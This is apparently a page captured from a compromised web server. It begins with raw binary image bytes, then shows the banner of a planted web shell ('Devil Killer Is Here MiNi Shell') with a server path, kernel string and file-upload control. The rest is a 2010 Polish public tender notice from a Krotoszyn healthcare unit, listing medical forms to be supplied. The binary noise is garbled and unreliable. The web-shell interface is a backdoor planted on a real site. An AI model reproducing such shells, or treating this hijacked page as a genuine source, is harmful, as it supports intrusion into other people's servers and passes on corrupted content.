JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100705/176797-N-2010.html

<p class="kh_header"><b>Krotoszyn: DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH.</b><br>
<b>Numer ogłoszenia: 176797 - 2010; data zamieszczenia: 05.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH - PAKIET NR 1-2 OKREŚLONE SZCZEGÓŁOWOW W ZAŁACZNIKU NR 2 - FORMULARZ CENOWY.
- Druki powinny być wykonane na papierze offsetowym o gramaturze 80g/m2.  
- Zamawiający wymaga umieszczenia na każdym druku i książce numeracji podanej przez Zamawiającego po podpisaniu umowy. 
- Zamawiający zastrzega sobie prawo zmiany wzorów druków narzuconych przez NFZ bez ponoszenia kosztów przygotowania nowych matryc.
- Zamawiający udostępni do wglądu wzory druków i książek w swojej siedzibie od momentu ogłoszenia postępowania przetargowego.
- Zamawiający wymaga dostaw towaru do magazynu Zamawiającego w ciągu 7 dni, a dostawy interwencyjne w ciągu 3 dni (waga jednej paczki z drukami nie powinna przekraczać 10 kg), na podstawie składanych zamówień cząstkowych, których wielkość będzie uzależniona wyłącznie od bieżącego zapotrzebowania Zamawiającego określonego rodzajem i zakresem zakontraktowanych przez NFZ świadczeń zdrowotnych.
- Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety.
- Zamawiający zastrzega sobie prawo zamówienia mniejszej ilości towaru w stosunku do wartości określonej w umowie. Obniżenie wartości zamówienia może nastąpić tylko z przyczyn niezależnych od Zamawiającego, przez które rozumie się zmianę rodzaju i zakresu zakontraktowanych przez NFZ świadczeń zdrowotnych, obniżenie popytu na świadczenia zdrowotne, zmianę metodologii diagnostyki leczenia lub reorganizację zakładu.
- Wykonawca zaakceptuje następujące warunki  płatności :
-	płatność nastąpi w terminie 30 dni od dnia otrzymania faktury przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH, MAKSYMALNIE 20 % WARTOŚCI ZAMÓWIENIA PODSTAWOWEGO.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJACY NIE WYMAGA WNIESIENIA WADIUM.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a)	Formularz ofertowy podpisany przez osobę upoważnioną do składania     oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b)	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
c)	Projekt umowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 4.

W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY:
2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	zmianę stawek podatku VAT,
	-	zmianę cen producenta papieru.
3. Zmiana stawek podatku VAT następuje z dniem ich wprowadzenia w życie stosownymi przepisami, natomiast zmiana cen producenta następuje z dniem wprowadzenia przez obie strony stosownego aneksu, z zastrzeżeniem § 13.
§ 13 PROJEKTU UMOWY:
1.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej  
w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem  nieważności.
2.     Strony dopuszczają zmiany umowy w zakresie: 
-	nazwy  i treści druku, 
-	liczby kart w druku lub książce.
 
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2010 godzina 10:00, miejsce: SEKRETARIAT SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DRUKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	1	F 0100 CPMiPZ	Ankieta dla kobiet objętych populacyjnym programem wczesnego wykrywania raka szyjki macicy	A4	41
2.	2	F 0038 CPMiPZ	Ankieta dla kobiet objętych populacyjnym programem wczesnego wykrywania raka piersi	A4	54
3.	3	F 0091 CPMiPZ	Karta badania mammograficznego- Program prof.raka piersi	A4	54
4.	6	PL-20	Badanie przedmiotowe / badanie podmiotowe ogólne	A3 dwust	340
5.	7	F 0034	Badanie usg - ginekologiczne	A5 bl	31
6.	8	F 0035	Badanie usg - położnicze	A5 bl	31
7.	9	F 0036	Badanie usg - ginekologiczno-położnicze	A5 bl	11
8.	10	S-14-LC	Badanie w kierunku wirusowego zapalenia wątroby / dwustronny	A6 dwust    bl	63
9.	13	PL-39	karta medycznych czynności ratunkowych	A4	161
10.	14	PL-38	Dane o pacjencie i rodzinie ZOP	A4	7
11.	24	F 0041	Elektrokardiogram	A4 dwust	250
12.			Informacja dla rodziny / opiekuna pacjenta	A6	160
13.	30	PL-03	Ginekologiczne badanie przedmiotowe	A4	27
14.	31	PL-29	Historia choroby AMBULATORIUM	2/3 A3 dwust	160
15.	32	PL-30	Historia choroby AMBULATORIUM - wkładka	A5 dwust	170
16.	33	PL-01	Historia choroby (szpital)	A3 dwust	340
17.	34	PL-32	Historia choroby - Oddział Medycyny Paliatywnej, Hospicjum Stacjonarne [4180 lub 5180]	A3 dwust	7
18.	36	PL-21	Historia choroby SOR (karta informacyjna leczenia)	A4 kopia bl	5
19.	37	PP-01	Historia opieki pielęgniarskiej	A3 dwust	150
20.	38	PL-31	Historia rozwoju noworodka	A3 dwust	180
21.	39	S/01/03B	Indywidualna karta pielęgnacji pacjenta z ryzykiem odleżyn i/lub z odleżynami WG NORTON	A4 dwustr	15
22.	42	F 0123 ZLU	Indywidualna karta zabiegów rehabilitacyjnych dla dzieci	A4 dustr	81
23.	43	F 0122 ZLU	Indywidualna karta zabiegów rehabilitacyjnych	A4 dustr	270
24.	44	PL-05	Indywidualna karta zleceń diagnostycznych  oddziału wewnętrznego	A4 dwustr	230
25.	45	PL-04	Indywidualna karta zleceń lekarskich	A4 dwustr	600
26.	46	F 0119 AOS	Informacja dla lekarza kierującego- kardiologia	A4 bl kopia	27
27.	49	Instr.32 Z-01	Karta badania histopatologicznego	A5 dwust	23
28.	51	PL-10	Karta badań laboratoryjnych. ODDZ. IOM	A3 dwust	34
29.	52	PL-06	Karta badań noworodka - ODDZ. NOWORODKOWY	A4 dwust	11
30.	53	F 0099	Karta bilansu płynów	A4	46
31.	54	F 0048	Karta chorób narządu rodnego- karta ginekologiczna	A4	54
32.	55	F 0049	Karta ciąży 	A4 dwust	18
33.	56	F 0125 ZLU	Karta ergoterapii - rehabilitacja	A4 dwust	14
34.	58	PL-08	Karta gorączkowa niemowlęcia	A4 dwust	47
35.	59	PL-07	Karta gorączkowa ogólna	A4 dwust	290
36.	60	PL-09	Karta gorączkowa położnicza- ODDZ.GIN-POŁ	A4 dwust	21
37.	62	F 0050 ZOL	Karta informacyjna (ZOL)	A4	14
38.	63	F 0051 ZOP	Karta informacyjna (ZOP)	A4	7
39.	64	Pr 20	Karta informacyjna leczenia szpitalnego	A4	400
40.	65	F 0052 PSPR	Karta informacyjna nr  (pogotowie)	1/3A6	135
41.	66	F 0055	Karta konsultacji	A4 dwust	141
42.	67	F 0056	Karta kontroli zgłoszeń (por. K)	A6 dwust	54
43.	68	F 0057 DZIEC.	Karta laboratoryjna badania moczu/ oddz. dziec.	A4 dwust	14
44.	71	PL-11	Karta obserwacji lekarskich	A4 dwust	510
45.	72	Pr.Z/1/05-01	Karta obserwacji pacjenta z centralnym wkłuciem dożylnym	A4 dwust	11
46.	74	PL-12	Karta obserwacji porodu- ODDZ.GIN-POŁ	A4	17
47.	75	PL-23	Karta obserwacji skóry noworodka ( I-IV; V-VII)	A4 dwust 2szt	14
48.	76	Pr 45. Z-03	Karta obserwacji wkłuć obwodowych	A4 bl	84
49.	77	F 0101	Karta obserwacji wybranych parametrów	A4	3
50.	78	PL-13	Karta obserwacyjna IOM	A4 dwust	27
51.	79	Pr 44. Z-02	Karta obserwacyjna pacjenta z cewnikiem założonym do pęcherza moczowego	A4 dwust	9
52.	83	PP-09	Karta opieki pielęgniarskiej - ODDZ.NOWORODKOWY	A4 dwust	14
53.	84	PP-05	Karta opieki pielęgniarskiej.ODDZ. IOM	A4 dwust	7
54.	85	PP-06	Karta opieki pielęgniarskiej - OPIEKA DŁUGOTERMINOWA	A4 dwust	75
55.	86	PP-11	Karta opieki pielęgniarskiej- ODDZ.POŁ-GIN	A4 dwust	67
56.	87	PP-07	Karta opieki pielęgniarskiej - ODDZ. WEW.	A3 dwust	134
57.	88	PP-04	Karta opieki pielęgniarskiej -ODDZ. CHIR.	A3 dwust	41
58.	89	PP-08	Karta opieki pielęgniarskiej  ODDZ.DZIECIĘCY	A4 dwust	27
59.	90	PL-14	Karta położnicza	A3 dwust	27
60.	91	PL-16	Karta postępowania z pacjentem po nagłym zatrzymaniu krążenia P.R	A4	14
61.	92	S/Oddz/1/01	Karta praw i obowiązków pacjenta	A4 dwust	260
62.	96	F 0121 ZLU	Karta rozwoju ruchowego dziecka pow.1 roku życia	A4 dwust	67
63.	97		Karta zgonu (karta statystyczna do karty zgonu)	A4 dwust	15
64.	100	F 0116 AOS	Karta testów skórnych /NOWA/	A4 dwust	14
65.	101	F 0003 norrn.	Karta uodpornienia/ Oddz. Nowor.	A4 dwustr sztywna	14
66.	102	PL-34	Karta zabiegów (rehabilitacja) ZOL/ZOP	A3 dwust	7
67.	103	F 0120 ZLU	Karta zabiegów /ZLU	A4	34
68.	104	F 0062	Karta zgłoszenia nowotworu złośliwego	A4 dwust	7
69.	105	F 0004	Karta zlecenia wyjazdu zespołu ratownictwa medycznego	A4 dwust	11
70.	105a	F 0004	Karta zlecenia wyjazdu zespołu ratownictwa medycznego - część 2 V	A4 	160
71.	106	PL-17	Karta zleceń dla oddziału IOM	A4 dwust	11
72.	107	F 0005	Karta zmian pozycji	A4 dwust	15
73.	109	F 0096 POŁ-GIN	Kontrola czynności serca płodu i ciś.tętniczego krwi ciężarnej- ODDZ.GIN-POŁ	A4 dwust	21
74.	110	F 0006	Karta kontroli poziomu cukru we krwi	A4 dwust	22
75.	111	F 0007 NOWOR.	Kontrola wypijanego pokarmu - ODDZ. NOWORODKOWY	A4 dwust	7
76.	145	PP-12	Karta obserwacji pielęgniarskich	A4 dwust	160
77.	147	F 0020	Informacja  dla rodziców (postępowanie po szczepieniu wzw i gruźlicy)	A6	11
78.	167	nfz	Informacja dla lekarza kierującego (aos	A5 bl kopia	165
79.	169	F 0107 ZOL/PPO	Kwalifikacja pielęgniarska do objęcia opieką w ZOL i PPO	A4	7
80.	178	F 0126 ZLU	Lista oczekujących na masaże wirowe i masaże suche (ZLU)	A4	7
81.	180	S/01/03A	Miesięczna karta rejestracji chorych zagrożonych ryzykiem wystąpienia odleżyn (monitorowanie standardu)	A4	31
82.	184	F 0127 ZLU	Ocena rozwoju ruchowego dziecka poniżej 1 roku życia	A4 dwust	27
83.	185		Ocena działań pielęgniarskich/ obserwacje pielęgniarskie	A4 dwust	120
84.	187	F 0014	Oświadczenie pacjenta (w sprawie dokumentacji)	A4 bl	400
85.	190	F 0071	Pisemne zgłoszenie urodzenia dziecka- ODDZ.GIN-POŁ	A4 3str	47
86.	191	PP-14	Plan opieki /noworodki/	A4 dwust	14
87.	192	PP-17	Plan pielęgnowania i karta czynności pielęgnacyjnych ZOL/ZOP zał nr 3	A4 3 str dwust	10
88.	204	Pr 2.Z-01	Karta depozytowa - przedmiotów wartościowych	A5 bl kopia	11
89.	208	F 0076 LC	Protokół identyfikacji przeciwciał do RCKIK	A5 bl	14
90.	209	Pr 48. Z-03	Protokół pielęgniarki operacyjnej- SALA PORODOWA, BLOK OPER.	A4	27
91.	210	Zarz.Dyr.17/03	Protokół przekazania pacjenta	A5 bl dwust	340
92.	211	PL-40	Przedoperacyjna ankieta anestezjologiczna	A3 dwustr	45
93.	228	F 0109 AOS	Skala Tiss - 28 interwencja terapeutyczna	A4 dwust	7
94.	231	F 0010	Subiektywna globalna ocena stanu odżywiania (SGA)	a4 bl	7
95.	234	S-07	Skierowanie do poradni specjalistycznej 	A5	78
96.	235	S-20-ZPDO	Skierowanie do pracowni diagnostycznej	A4 bl kopia	270
97.	237	S-22-ZPDO	Skierowanie do pracowni rezonansu magnetycznego /tomografii komputerowej	A4 dwust	140
98.	238	S-01	Skierowanie do szpitala 	A4 bl	270
99.	239	S-02	Skierowanie do szpitala psychiatrycznego	A4 dwust	10
100.	240	Pr 37. Z-04	Skierowanie na wykonanie próby zgodności 	A5 bl	90
101.	241	Pr 37. Z-02	Skierowanie na badania kwalifikujące do podania immunoglobuliny anty D	A5 bl	5
102.	243	Pr 37. Z-03	Skierowanie na badanie grupy krwi	A6 bl	100
103.	245	Pr 37. Z-05	Skierowanie na krew do pilnej transfuzji	A6 bl	86
104.	246	S-03	Skierowanie na leczenie uzdrowiskowe	A4 dwust	27
105.	248	S-18-ZLU	Skierowanie na zabiegi fizjoterapeutyczne	A5 bl	28
106.	254	PL-18	Karta znieczulenia SP ZOZ Krotoszyn 	A4 kopia bl	81
107.	256	F 0053 	Karta kwalifikacji do żywienia pozajelitowego lub dojelitowego	A4 dwust	7
108.	257	F 0054	Karta żywienia pozajelitowego metaboliczna	A4 dwust	4
109.	260		System czynnej rejestracji zakażeń  (zabiegi i procedury)	A5 bl	9
110.	282	F 0113 AOS	Wkładka do historii choroby (diabetologia) od 01.01.07	A4 dwust	67
111.	287	W-21-LC	Wynik badania kału na krew utajoną	A6 bl	7
112.	288	W-22-LC	Wynik badanie kału na obecność cyst Lamblii Intestinalis	A6	7
113.	290	W-24-LC	Wynik badania- mocz	A5 bl	540
114.	293	W-23-LC	Wynik badania-cukier we krwi	A5 bl	540
115.	294	W-02-LC	Wynik badania cytologicznego szyjki macicy	A5 bl	41
116.	296	W-04-LC	Wynik badania grupowego krwi	A6 bl	95
117.	298	W-13-LC	Wynik badania kału na obecność pasożytów	A6 bl	14
118.	300	W-03-LC	Wynik badania laboratoryjnego / pusty	A6 bl	33
119.	303	W-10-LC	Wynik badania laboratoryjnego - KOAGULOLOGIA	A5 bl	67
120.	304	W-05-LC	Wynik badania laboratoryjnego- seromukoid	A6 bl	67
121.	308	W-15-LC	Wynik badania przeciwciał odpornościowych	A5	35
122.	309	W-06-LC	Wynik badania laboratoryjnego- PT	A6 bl	27
123.	310	W-16-LC	Wynik badań kwalifikacyjnych do podania immunoglobuliny ANTY-D	A5	700
124.	311	W-17-LC	Wynik próby zgodności 	A5	14
125.	313	W-19-LC	Wyniki badania poziomu hormonów płciowych 	A5 bl	80
126.	314	F 0097 POŁ-GIN	Wyniki badań laboratoryjnych-ODDZ.GIN-POŁ	A4	7
127.	315	F 0021	Wyniki laboratoryjne- Oddz. Nowor.	A4	10
128.	316	F 0098 ZPDO	Wywiad z pacjentem przed badaniem z uzyciem dozylnych środków cieniujacych	A4 bl	89
129.	317	W-20-LC	Wywiad do grupy krwi i przeciwciał	A6 bl	30
130.	318	PP-02	Wywiad pielęgniarski  OPD	A3  dwust	9
131.	320	Pr 37. Z-01	Zamówienie na krew i jej składniki	A5 bl	81
132.	322	F 0025	Zapotrzebowanie na leki nr samokopiujący, format A4,nr 322a	A4 bl kopia 	46
133.	322	F 0025	Zapotrzebowanie na leki nr  samokopiujący, format A5, nr 322b	A5 bl kopia	31
134.	327		Zaswiadczenie lekarskie- dla kobiety ciężarnej Rozp. Min.Zdr z 18.09.2009	A4	11
135.	328	F 0028	Zaświadczenie lekarskie 	A5 bl	247
136.	329	F 0030	Zaświadczenie lekarskie dla organów ścigania	A4 dwust	7
137.	330	F 0032	Zaświadczenie lekarskie do ZOP lub ZOL	A4 bl	7
138.	332	PP-13	Zbiorcza uproszczona ocena stanu chorego i efektywności opieki 	A4 dwust	7
139.	336	F 0102 ZPDO	Zestawienie wykonanych badań RTG	A4 dwust	10
140.	339	Zał. nr 1 instr.1 DZG	Zapotrzebowanie na artykuły papiernicze i druki	A4 dwust	3
141.	352	PL-19	Zgoda pacjenta na dokonanie zabiegu w znieczuleniu - IOM	A4 bl 	134
142.	353	PP-16	Zgoda pacjenta na objęcie opieką przez hospicjum domowe,stacjonarne, oddz.med.pal.	A4 bl	13
143.	355	Zarz.Dyr.26/02	Zgoda pacjenta na zabieg operacyjny / badanie diagnostyczne	A4	88
144.	359	F 0079	Zlecenie na transport sanitarny	A4	71
145.	361	F 0081	Zlecenie na zabiegi dokonywane przez fleczerów, pielęgniarki	A6	21
